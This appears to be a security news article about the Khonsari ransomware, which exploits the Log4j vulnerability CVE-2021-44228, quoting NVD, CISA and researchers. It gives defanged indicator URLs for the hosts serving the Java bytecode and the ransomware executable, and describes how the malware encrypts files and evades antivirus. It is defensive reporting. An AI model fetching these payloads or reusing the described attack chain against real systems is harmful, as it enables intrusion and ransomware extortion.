Khonsari is a novel ransomware family currently attempting to exploit the critical Apache Log4j vulnerability, also known as CVE-2021-44228, Log4Shell and Logjam.
Apache Log4j Vulnerability: CVE-2021-44228
According to the National Vulnerability Database, “Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints.” In other words, threat actors who can control log message parameters will also be able to execute arbitrary code loaded from LDAP server. The only condition is that message lookup substitution is enabled.
Novel Khonsari Ransomware Family
Bitdefender researchers recently observed that attackers are exploiting the Log4j vulnerability to deliver malicious payloads, including the previously unknown Khonsari ransomware targeting Windows servers.
In another technical overview of Khonsari, Cado researchers say that “the exploit loads the Java bytecode at hxxp://3.145.115[.]94/Main.class via JNDI, which then downloads the Kohnsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.”
The researchers were capable of retrieving a sample of the ransomware to perform a static and a forensic analysis.
The ransomware is coded in C# and uses the .NET framework. It retrieves the source code via decompilation in a straightforward manner, using tools such as ILspy. Once decompiled, the source code reveals what the malware’s capabilities are:
Khonsari is – frankly – a bit boring. It weighs in at only 12 KB and contains only the most basic functionality required to perform it’s ransomware objective. It’s size and simplicity is also a strength however – at the time we ran the malware dynamically it wasn’t detected by the systems built in Antivirus, Cado researchers said.
Once it is executed, the ransomware enumerates all mounted drives, apart from C:\, initiating encryption of all contents found on the drives. It appears that encryption of the C:\ drive is more targeted – Khonsari targets user directors, including Documents, Videos, Pictures, Downloads and Desktop. Each file is encrypted via the AES-128 CBC algorithm. Once encryption is finished, the .khonsari extension is appended to encrypted data.
Khonsari Ransomware Using CVE-2021-44228
The ransomware is currently exploiting the critical Apache bug. However, the attacks based on this vulnerability are also downloading an additional malicious payload – the Orcus remote access trojan.
The U.S. Cybersecurity and Infrastructure Security Agency was the one to make the disclosure of the active exploitation of the flaw.
“CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system,” the CISA alert said.
Patching CVE-2021-44228 is highly advisory. CISA has created the Apache Log4j Vulnerability Guidance to help with addressing the critical issue.
In July 2021, the REvil ransomware gang carried out an unprecedented supply chain ransomware attack against customers of Kaseya’s VSA product. The attacks were based on exploiting the CVE-2021-30116 zero-days.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: